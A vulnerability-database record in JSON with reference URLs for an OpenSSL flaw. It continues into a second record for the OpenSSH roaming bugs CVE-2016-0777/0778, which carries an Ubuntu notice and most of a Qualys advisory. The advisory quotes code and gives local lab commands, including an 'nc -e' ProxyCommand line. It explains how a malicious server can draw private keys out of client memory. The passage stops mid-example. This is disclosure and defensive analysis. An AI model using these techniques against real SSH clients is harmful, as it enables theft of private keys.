        "url": "https://access.redhat.com/security/cve/cve-2016-2107"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1839"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2177"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4483"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3523"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2842"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-8612"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1148"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1840"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-0797"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3185"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1836"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-3185"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-3194"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1833"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=distributions\u0026version=2.4.23"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8176"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1840"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1836"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1762"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1835"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4449"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-0286"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1762"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-5420"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2178"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-3627"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2012-1148"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1837"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1834"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1837"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1839"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-5419"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-0209"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0702"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-3216"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1838"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1833"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1834"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4447"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-7141"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-0799"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-07950"
      },
      {
        "db": "VULHUB",
        "id": "VHN-81156"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3195"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006116"
      },
      {
        "db": "PACKETSTORM",
        "id": "141239"
      },
      {
        "db": "PACKETSTORM",
        "id": "137292"
      },
      {
        "db": "PACKETSTORM",
        "id": "139114"
      },
      {
        "db": "PACKETSTORM",
        "id": "136346"
      },
      {
        "db": "PACKETSTORM",
        "id": "139116"
      },
      {
        "db": "PACKETSTORM",
        "id": "140182"
      },
      {
        "db": "PACKETSTORM",
        "id": "134783"
      },
      {
        "db": "PACKETSTORM",
        "id": "134632"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-075"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3195"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-07950"
      },
      {
        "db": "VULHUB",
        "id": "VHN-81156"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3195"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006116"
      },
      {
        "db": "PACKETSTORM",
        "id": "141239"
      },
      {
        "db": "PACKETSTORM",
        "id": "137292"
      },
      {
        "db": "PACKETSTORM",
        "id": "139114"
      },
      {
        "db": "PACKETSTORM",
        "id": "136346"
      },
      {
        "db": "PACKETSTORM",
        "id": "139116"
      },
      {
        "db": "PACKETSTORM",
        "id": "140182"
      },
      {
        "db": "PACKETSTORM",
        "id": "134783"
      },
      {
        "db": "PACKETSTORM",
        "id": "134632"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-075"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3195"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-12-07T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-07950"
      },
      {
        "date": "2015-12-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-81156"
      },
      {
        "date": "2015-12-06T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-3195"
      },
      {
        "date": "2015-12-08T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-006116"
      },
      {
        "date": "2017-02-23T17:10:09",
        "db": "PACKETSTORM",
        "id": "141239"
      },
      {
        "date": "2016-06-02T19:12:12",
        "db": "PACKETSTORM",
        "id": "137292"
      },
      {
        "date": "2016-10-12T20:16:45",
        "db": "PACKETSTORM",
        "id": "139114"
      },
      {
        "date": "2016-03-22T15:18:02",
        "db": "PACKETSTORM",
        "id": "136346"
      },
      {
        "date": "2016-10-12T23:44:55",
        "db": "PACKETSTORM",
        "id": "139116"
      },
      {
        "date": "2016-12-16T16:34:49",
        "db": "PACKETSTORM",
        "id": "140182"
      },
      {
        "date": "2015-12-14T16:40:07",
        "db": "PACKETSTORM",
        "id": "134783"
      },
      {
        "date": "2015-12-04T17:22:00",
        "db": "PACKETSTORM",
        "id": "134632"
      },
      {
        "date": "2015-12-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201512-075"
      },
      {
        "date": "2015-12-06T20:59:05.973000",
        "db": "NVD",
        "id": "CVE-2015-3195"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-12-07T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-07950"
      },
      {
        "date": "2022-12-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-81156"
      },
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-3195"
      },
      {
        "date": "2016-11-22T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-006116"
      },
      {
        "date": "2022-12-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201512-075"
      },
      {
        "date": "2023-11-07T02:25:31.687000",
        "db": "NVD",
        "id": "CVE-2015-3195"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "137292"
      },
      {
        "db": "PACKETSTORM",
        "id": "134783"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-075"
      }
    ],
    "trust": 0.8
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "OpenSSL of  crypto/asn1/tasn_dec.c of  ASN1_TFLG_COMBINE Vulnerability in the implementation of critical information obtained from process memory",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006116"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-075"
      }
    ],
    "trust": 0.6
  }
}

VAR-201601-0030

Vulnerability from variot - Updated: 2024-07-23 20:39

The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. In addition, JVNVU#95595627 Then CWE-122 It is published as CWE-122: Heap-based Buffer Overflow http://cwe.mitre.org/data/definitions/122.htmlA large amount of transfer is requested by the remote server, resulting in a denial of service ( Heap-based buffer overflow ) It can be unspecified, such as being put into a state. OpenSSH is prone to a heap-based buffer-overflow vulnerability. Successful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. ============================================================================ Ubuntu Security Notice USN-2869-1 January 14, 2016

openssh vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 15.10
Ubuntu 15.04
Ubuntu 14.04 LTS
Ubuntu 12.04 LTS

Summary:

OpenSSH could be made to expose sensitive information over the network.

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 15.10: openssh-client 1:6.9p1-2ubuntu0.1

Ubuntu 15.04: openssh-client 1:6.7p1-5ubuntu1.4

Ubuntu 14.04 LTS: openssh-client 1:6.6p1-2ubuntu2.4

Ubuntu 12.04 LTS: openssh-client 1:5.9p1-5ubuntu1.8

In general, a standard system update will make all the necessary changes. Qualys Security Advisory

Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778

======================================================================== Contents ========================================================================

Summary Information Leak (CVE-2016-0777) - Analysis - Private Key Disclosure - Mitigating Factors - Examples Buffer Overflow (CVE-2016-0778) - Analysis - Mitigating Factors - File Descriptor Leak Acknowledgments Proof Of Concept

======================================================================== Summary ========================================================================

Since version 5.4 (released on March 8, 2010), the OpenSSH client supports an undocumented feature called roaming: if the connection to an SSH server breaks unexpectedly, and if the server supports roaming as well, the client is able to reconnect to the server and resume the suspended SSH session. This information leak may have already been exploited in the wild by sophisticated attackers, and high-profile sites or users may need to regenerate their SSH keys accordingly.

The buffer overflow, on the other hand, is present in the default configuration of the OpenSSH client but its exploitation requires two non-default options: a ProxyCommand, and either ForwardAgent (-A) or ForwardX11 (-X). This buffer overflow is therefore unlikely to have any real-world impact, but provides a particularly interesting case study.

All OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be easily hot-fixed by setting the undocumented option "UseRoaming" to "no", as detailed in the Mitigating Factors section. OpenSSH version 7.1p2 (released on January 14, 2016) disables roaming by default.

======================================================================== Information Leak (CVE-2016-0777) ========================================================================

Analysis

If the OpenSSH client connects to an SSH server that offers the key exchange algorithm "resume@appgate.com", it sends the global request "roaming@appgate.com" to the server, after successful authentication. If this request is accepted, the client allocates a roaming buffer out_buf, by calling malloc() (and not calloc()) with an out_buf_size that is arbitrarily chosen by the server:

63 void 64 roaming_reply(int type, u_int32_t seq, void *ctxt) 65 { 66 if (type == SSH2_MSG_REQUEST_FAILURE) { 67 logit("Server denied roaming"); 68 return; 69 } 70 verbose("Roaming enabled"); .. 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size()); .. 77 }

40 static size_t out_buf_size = 0; 41 static char out_buf = NULL; 42 static size_t out_start; 43 static size_t out_last; .. 75 void 76 set_out_buffer_size(size_t size) 77 { 78 if (size == 0 || size > MAX_ROAMBUF) 79 fatal("%s: bad buffer size %lu", func, (u_long)size); 80 / 81 * The buffer size can only be set once and the buffer will live 82 * as long as the session lives. 83 */ 84 if (out_buf == NULL) { 85 out_buf_size = size; 86 out_buf = xmalloc(size); 87 out_start = 0; 88 out_last = 0; 89 } 90 }

The OpenSSH client's roaming_write() function, a simple wrapper around write(), calls wait_for_roaming_reconnect() to transparently reconnect to the SSH server after a disconnection. It also calls buf_append() to copy the data sent to the server into the roaming buffer out_buf. During a reconnection, the client is therefore able to resend the data that was not received by the server because of the disconnection:

198 void 199 resend_bytes(int fd, u_int64_t offset) 200 { 201 size_t available, needed; 202 203 if (out_start < out_last) 204 available = out_last - out_start; 205 else 206 available = out_buf_size; 207 needed = write_bytes - offset; 208 debug3("resend_bytes: resend %lu bytes from %llu", 209 (unsigned long)needed, (unsigned long long)*offset); 210 if (needed > available) 211 fatal("Needed to resend more data than in the cache"); 212 if (out_last < needed) { 213 int chunkend = needed - out_last; 214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend, 215 chunkend); 216 atomicio(vwrite, fd, out_buf, out_last); 217 } else { 218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed); 219 } 220 }

In the OpenSSH client's roaming buffer out_buf, the most recent data sent to the server begins at index out_start and ends at index out_last. As soon as this circular buffer is full, buf_append() maintains the invariant "out_start = out_last + 1", and consequently three different cases have to be considered:

"out_start < out_last" (lines 203-204): out_buf is not full yet (and out_start is still equal to 0), and the amount of data available in out_buf is indeed "out_last - out_start";
"out_start > out_last" (lines 205-206): out_buf is full (and out_start is exactly equal to "out_last + 1"), and the amount of data available in out_buf is indeed the entire out_buf_size;
"out_start == out_last" (lines 205-206): no data was ever written to out_buf (and both out_start and out_last are still equal to 0) because no data was ever sent to the server after roaming_reply() was called, but the client sends (leaks) the entire uninitialized out_buf to the server (line 214), as if out_buf_size bytes of data were available.

In order to successfully exploit this information leak and retrieve sensitive information from the OpenSSH client's memory (for example, private SSH keys, or memory addresses useful for further exploitation), a malicious server needs to:

Massage the client's heap before roaming_reply() malloc()ates out_buf, and force malloc() to return a previously free()d but uncleansed chunk of sensitive information. The simple proof-of-concept in this advisory does not implement heap massaging.
Guess the client's get_snd_buf_size() in order to precisely control out_buf_size. OpenSSH < 6.0 accepts out_buf sizes in the range (0,4G), and OpenSSH >= 6.0 accepts sizes in the range (0,2M]. Sizes smaller than get_snd_buf_size() are attainable because roaming_reply() does not protect "packet_get_int() + get_snd_buf_size()" against integer wraparound. The proof-of-concept in this advisory attempts to derive the client's get_snd_buf_size() from the get_recv_buf_size() sent by the client to the server, and simply chooses a random out_buf_size.
Advise the client's resend_bytes() that all "available" bytes (the entire out_buf_size) are "needed" by the server, even if fewer bytes were actually written by the client to the server (because the server controls the "offset" argument, and resend_bytes() does not protect "needed = write_bytes - offset" against integer wraparound).

Finally, a brief digression on a minor bug in resend_bytes(): on 64-bit systems, where "chunkend" is a 32-bit signed integer, but "out_buf" and "out_buf_size" are 64-bit variables, "out_buf + out_buf_size - chunkend" may point out-of-bounds, if chunkend is negative (if out_buf_size is in the [2G,4G) range). This negative chunkend is then converted to a 64-bit size_t greater than SSIZE_MAX when passed to atomicio(), and eventually returns EFAULT when passed to write() (at least on Linux and OpenBSD), thus avoiding an out-of-bounds read from the OpenSSH client's memory.

Private Key Disclosure

We initially believed that this information leak in the OpenSSH client's roaming code would not allow a malicious SSH server to steal the client's private keys, because:

the information leaked is not read from out-of-bounds memory, but from a previously free()d chunk of memory that is recycled to malloc()ate the client's roaming buffer out_buf;
private keys are loaded from disk into memory and freed by key_free() (old API, OpenSSH < 6.7) or sshkey_free() (new API, OpenSSH >= 6.7), and both functions properly cleanse the private keys' memory with OPENSSL_cleanse() or explicit_bzero();
temporary copies of in-memory private keys are freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse these copies with memset() or bzero().

However, we eventually identified three reasons why, in our experiments, we were able to partially or completely retrieve the OpenSSH client's private keys through this information leak (depending on the client's version, compiler, operating system, heap layout, and private keys):

(besides these three reasons, other reasons may exist, as suggested by the CentOS and Fedora examples at the end of this section)

If a private SSH key is loaded from disk into memory by fopen() (or fdopen()), fgets(), and fclose(), a partial or complete copy of this private key may remain uncleansed in memory. Indeed, these functions manage their own internal buffers, and whether these buffers are cleansed or not depends on the OpenSSH client's libc (stdio) implementation, but not on OpenSSH itself.
In all vulnerable OpenSSH versions, SSH's main() function calls load_public_identity_files(), which loads the client's public keys with fopen(), fgets(), and fclose(). Unfortunately, the private keys (without the ".pub" suffix) are loaded first and then discarded, but nonetheless buffered in memory by the stdio functions.
In OpenSSH versions <= 5.6, the load_identity_file() function (called by the client's public-key authentication method) loads a private key with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses fgets() and hence internal stdio buffering.

Internal stdio buffering is the most severe of the three problems discussed in this section, although GNU/Linux is not affected because the glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. BSD-based systems, on the other hand, are severely affected because they simply malloc()ate and free() stdio buffers. For interesting comments on this issue:

https://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk

In OpenSSH versions >= 5.9, the client's load_identity_file() function (called by the public-key authentication method) read()s a private key in 1024-byte chunks that are appended to a growing buffer (a realloc()ating buffer) with buffer_append() (old API) or sshbuf_put() (new API). Unfortunately, the repeated calls to realloc() may leave partial copies of the private key uncleansed in memory.
In OpenSSH < 6.7 (old API), the initial size of such a growing buffer is 4096 bytes: if a private-key file is larger than 4K, a partial copy of this private key may remain uncleansed in memory (a 3K copy in a 4K buffer). Fortunately, only the file of a very large RSA key (for example, an 8192-bit RSA key) can exceed 4K.
In OpenSSH >= 6.7 (new API), the initial size of a growing buffer is 256 bytes: if a private-key file is larger than 1K (the size passed to read()), a partial copy of this private key may remain uncleansed in memory (a 1K copy in a 1K buffer). For example, the file of a default-sized 2048-bit RSA key exceeds 1K.

For more information on this issue:

https://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources

https://cwe.mitre.org/data/definitions/244.html

An OpenSSH growing-buffer that holds a private key is eventually freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse the buffer with memset() or bzero() before they call free(). Unfortunately, an optimizing compiler may remove this memset() or bzero() call, because the buffer is written to, but never again read from (an optimization known as Dead Store Elimination).

OpenSSH 6.6 is the only version that is not affected, because it calls explicit_bzero() instead of memset() or bzero().

Dead Store Elimination is the least severe of the three problems explored in this section, because older GCC versions do not remove the memset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5 and Clang/LLVM do, however, remove it. For detailed discussions of this issue:

https://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations

https://cwe.mitre.org/data/definitions/14.html

https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506

Finally, for these three reasons, passphrase-encrypted SSH keys are leaked in their encrypted form, but an attacker may attempt to crack the passphrase offline. On the other hand, SSH keys that are available only through an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the undocumented option "UseRoaming no" to the system-wide configuration file (usually /etc/ssh/ssh_config), or per-user configuration file (~/.ssh/config), or command-line (-o "UseRoaming no").

If an OpenSSH client is disconnected from an SSH server that offers roaming, it prints "[connection suspended, press return to resume]" on stderr, and waits for '\n' or '\r' on stdin (and not on the controlling terminal) before it reconnects to the server; advanced users may become suspicious and press Control-C or Control-Z instead, thus avoiding the information leak:

"`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key

$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume]^Z [1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1

However, SSH commands that use the local stdin to transfer data to the remote server are bound to trigger this reconnection automatically (upon reading a '\n' or '\r' from stdin). Moreover, these non-interactive SSH commands (for example, backup scripts and cron jobs) commonly employ public-key authentication and are therefore perfect targets for this information leak:

$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.ls" [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]

$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.tar" tar: Removing leading `/' from member names [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] ... [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]

Similarly, the SCP client uses the SSH client's stdin and stdout to transfer data, and can be forced by a malicious SSH server to output a control record that ends in '\n' (an error message in server-to-client mode, or file permissions in client-to-server mode); this '\n' is then read from stdin by the fgetc() call in wait_for_roaming_reconnect(), and triggers an automatic reconnection that allows the information leak to be exploited without user interaction:

env ROAMING="scp_mode sleep:1" "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key

$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp $ [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]

$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting] lost connection

Although a man-in-the-middle attacker can reset the TCP connection between an OpenSSH client and an OpenSSH server (which does not support roaming), it cannot exploit the information leak without breaking server host authentication or integrity protection, because it needs to:
first, append the "resume@appgate.com" algorithm name to the server's initial key exchange message;
second, in response to the client's "roaming@appgate.com" request, change the server's reply from failure to success.

In conclusion, an attacker who wishes to exploit this information leak must convince its target OpenSSH client to connect to a malicious server (an unlikely scenario), or compromise a trusted server (a more likely scenario, for a determined attacker).

In the client, wait_for_roaming_reconnect() calls ssh_connect(), the same function that successfully established the first connection to the server; this function supports four different connection methods, but each method contains a bug and may fail to establish a second connection to the server:
In OpenSSH >= 6.5 (released on January 30, 2014), the default ssh_connect_direct() method (a simple TCP connection) is called by wait_for_roaming_reconnect() with a NULL aitop argument, which makes it impossible for the client to reconnect to the server:

418 static int 419 ssh_connect_direct(const char host, struct addrinfo aitop, ... 424 int sock = -1, attempt; 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV]; ... 430 for (attempt = 0; attempt < connection_attempts; attempt++) { ... 440 for (ai = aitop; ai; ai = ai->ai_next) { ... 470 } 471 if (sock != -1) 472 break; / Successful connection. / 473 } 474 475 / Return failure if we didn't get a successful connection. / 476 if (sock == -1) { 477 error("ssh: connect to host %s port %s: %s", 478 host, strport, strerror(errno)); 479 return (-1); 480 }

Incidentally, this error() call displays stack memory from the uninitialized strport[] array, a byproduct of the NULL aitop:

$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1

$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor

The special ProxyCommand "-" communicates with the server through the client's stdin and stdout, but these file descriptors are close()d by packet_backup_state() at the beginning of wait_for_roaming_reconnect() and are never reopened again, making it impossible for the client to reconnect to the server. Moreover, the fgetc() that waits for '\n' or '\r' on the closed stdin returns EOF and forces the client to exit():

$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013

$ /usr/bin/nc -e "/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1" 127.0.0.1 222 Pseudo-terminal will not be allocated because stdin is not a terminal. user@127.0.0.1's password: [connection suspended, press return to resume][exiting]

The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that passes a connected file descriptor back to the client, but it calls fatal() while reconnecting to the server, because waitpid() returns ECHILD; indeed, the SIGCHLD handler (installed by SSH's main() after the first successful connection to the server) calls waitpid() before ssh_proxy_fdpass_connect() does:

1782 static void 1783 main_sigchld_handler(int sig) 1784 { .... 1789 while ((pid = waitpid(-1, &status, WNOHANG)) > 0 || 1790 (pid < 0 && errno == EINTR)) 1791 ; 1792 1793 signal(sig, main_sigchld_handler); .... 1795 }

101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 121 / Fork and execute the proxy command. / 122 if ((pid = fork()) == 0) { ... 157 } 158 / Parent. / ... 167 while (waitpid(pid, NULL, 0) == -1) 168 if (errno != EINTR) 169 fatal("Couldn't wait for child: %s", strerror(errno));

$ /usr/bin/ssh -V OpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015

$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand="/usr/bin/nc -F %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Couldn't wait for child: No child processes

The method ssh_proxy_connect() fork()s a standard ProxyCommand that connects the client to the server, but if a disconnection occurs, and the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is waiting for a '\n' or '\r' on stdin, EOF is returned (the underlying read() returns EINTR) and the client exit()s before it can reconnect to the server:

$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014

$ /usr/bin/ssh -o ProxyCommand="/bin/nc %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][exiting]

This behavior is intriguing, because (at least on Linux and BSD) the signal() call that installed the main_sigchld_handler() is supposed to be equivalent to a sigaction() call with SA_RESTART. However, portable versions of OpenSSH override signal() with mysignal(), a function that calls sigaction() without SA_RESTART.

This last mitigating factor is actually a race-condition bug that depends on the ProxyCommand itself: for example, the client never fails to reconnect to the server when using Socat as a ProxyCommand, but fails occasionally when using Netcat.

Private Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key

$ head -n 1 /etc/motd FreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014

$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013

